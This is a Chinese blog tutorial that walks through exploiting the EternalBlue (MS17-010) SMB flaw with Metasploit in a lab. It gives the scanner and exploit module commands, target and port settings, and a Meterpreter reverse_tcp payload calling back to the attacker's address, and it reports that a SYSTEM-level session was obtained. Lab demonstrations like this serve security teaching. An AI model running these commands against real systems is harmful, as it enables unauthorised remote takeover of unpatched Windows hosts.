首页 > 其他分享 >msf-永恒之蓝利用演示

msf-永恒之蓝利用演示

时间:2023-08-28 22:56:56浏览次数:35  
标签:set 演示 模块 攻击 010 设置 永恒 msf

使用Msf演示永恒之蓝漏洞的利用过程

MSF的功能模块介绍
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程

1、Auxiliary(辅助模块)
为渗透测试信息搜集提供了大量的辅助模块支持
2、Exploits(攻击模块)
利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
3、Payload(攻击载荷模块)
攻击成功后促使靶机运行的一段植入代码
4、Post (后渗透攻击模块)
收集更多信息或进一步访问被利用的目标系统
5、Encoders(编码模块)
将攻击载荷进行编码,来绕过防护软件拦截

 

永恒之蓝漏洞演示:

靶机网络信息

攻击机网络信息

 

连通性测试

 

msf数据库启用

启动

永恒之蓝漏洞测试

永恒之蓝的漏洞编号:ms17-010

根据漏洞名称搜索 : search ms17_010

 

辅助模块扫描目标
设置模块:use auxiliary/scanner/smb/smb_ms17_010

查看设置:options

 


设置所需信息

设置目标地址:set rhosts 192.168.174.129

目标端口默认是445,
如果用nmap端口扫描windows文件共享服务不是开放在445端口上面,那这里需要进行修改,set rport 目标端口

设置好了之后,run或者exploit 进行攻击

绿色的加号为可攻击

2、设置攻击模块对目标进行攻击
使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:options

设置所需信息:

设置目标地址:set RHOSTS 192.168.48.219

设置目标端口:set RPORT 445

设置payload:set payload windows/x64/meterpreter/reverse_tcp

设置本地地址:set LHOST 192.168.48.140

 

攻击:run或者exploit
 

攻击成功,成功拿到会话

查看目前权限 gutuid

系统权限

标签:set,演示,模块,攻击,010,设置,永恒,msf
From: https://www.cnblogs.com/xlvbys/p/17663607.html

相关文章

  • MSF中好玩的Post 模块
    一旦受害者机器必须被者入侵,测试者可以使用msf后期利用模块来收集有关受害者的信息或证据。metasploit框架中有478个后期开发模块可用,在post模块的帮助下,让后期的测试会变得更有趣。本文将为你介绍常用的几个post模块的使用,感兴趣就收藏吧!如下,当我们成功得到系统的shell后,便可......
  • Python基础入门学习笔记 028 文件:因为懂你,所以永恒
    大多数u程序都是:首先接收输入数据,然后按照要求进行处理,最后输出数据 虽然当前数据放在内存中存取的速度要比硬盘中快,但一旦断电则会丢失,所以尽量ctrl+s保持到硬盘中 什么是文件打开文件1open(file,mode='r',buffering=-1,encoding=None,errors=None,newline=None,......
  • 【测试硬解篇】N5105,N6005,J6412,J6413黑群晖物理机安装操作指南,开通核显硬解图文演示(适
    第一步、安装播放器 没有播放器的可以在软件中心添加一个软件下载原:DSM7.x矿神SPK套件源:https://spk7.imnks.com/顺便说一下如何添加软件源打开套件中心---设置 如图新增 添加后就可以正常添加jellyfin二、安装后打开jellyfin 设置用户名,然后选择视频所在的文件夹......
  • 如何使用 ChatGPT 将文本转换为 PowerPoint 演示文稿
    d推荐:使用NSDT场景编辑器助你快速搭建可二次编辑的3D应用场景步骤1:将文本转换为幻灯片演示文稿第一步涉及指示ChatGPT根据给定的文本生成具有特定数量幻灯片的演示文稿。首先,您必须向ChatGPT提供要转换的文本。使用以下提示指示ChatGPT创建演示文稿:请将以下文本转换......
  • OpenCV3.2图像分割 实例8:Grabcut原理与演示应用
    1#include<opencv2/opencv.hpp>2#include<iostream>3#include<math.h>45usingnamespacecv;6usingnamespacestd;78intnumRun=0;9Rectrect;10boolinit=false;11Matsrc,image;12Matmask,bgMo......
  • k8s Service(一) ClusterIP、NodePort、LoadBalancer、externalIPs 演示
    目录:Service简介kube-proxy3种不同的数据调度模式Service资源的定义格式示例1:ClusterIP演示示例2:NodePort演示示例3:LoadBalancer演示示例4:externalIPs演示Service简介Service:可以理解为pod的负债均衡器,标准资源类型,ServiceController为动态的一组Pod提......
  • 互斥量概念、用法、死锁演示及解决详解
    互斥量概念、用法、死锁演示及解决详解视频:https://www.bilibili.com/video/BV1Yb411L7ak?p=7&vd_source=4c026d3f6b5fac18846e94bc649fd7d0参考文章:https://blog.csdn.net/qq_38231713/article/details/106091902互斥量(mutex)如果想深入了解可以具体看一下操作系统互斥量的讲......
  • Aidlux demo演示
    aidluxdemo展示:人脸关键点检测演示点击例子,点击runnow运行即可,效果如下,我就不露脸了手势识别效果还不错,fps也不低......
  • 【蓝桥杯备赛系列 | 简单题】数组排序(八大排序演示)
    ......
  • 深入理解线程与进程:概念、特点与区别,附带代码演示
    当今计算机系统中,线程(Thread)和进程(Process)是并发编程中的关键概念。它们对于提高程序的效率和性能至关重要。本篇博客将详细介绍线程和进程的概念、特点以及它们之间的区别,同时通过代码演示来加深理解。1.线程1.1概念线程是操作系统能够进行运算调度的最小单位。一个进程可以包含......